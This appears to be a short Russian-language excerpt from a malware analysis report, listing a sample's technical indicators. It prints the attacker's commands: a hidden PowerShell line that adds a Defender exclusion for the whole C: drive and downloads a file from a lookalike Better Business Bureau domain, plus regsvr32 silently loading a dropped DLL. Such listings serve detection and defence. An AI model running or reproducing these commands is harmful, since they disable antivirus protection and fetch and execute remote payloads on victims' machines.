Техническая информация
- %TEMP%\.dll
- DNS ASK be########nessbureau-share-file.com
- '%WINDIR%\syswow64\timeout.exe' /t 15
- '%WINDIR%\syswow64\regsvr32.exe' /s %TEMP%\.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\';timeout /t 15;$a=$env:tmp+'\.dll';$c=$env:tmp+'\CC3USWBBB.pdf';$x=new-object system.net.webclient;$x.downloadfile('https://betterbusinessbureau-share-file.... (со скрытым окном)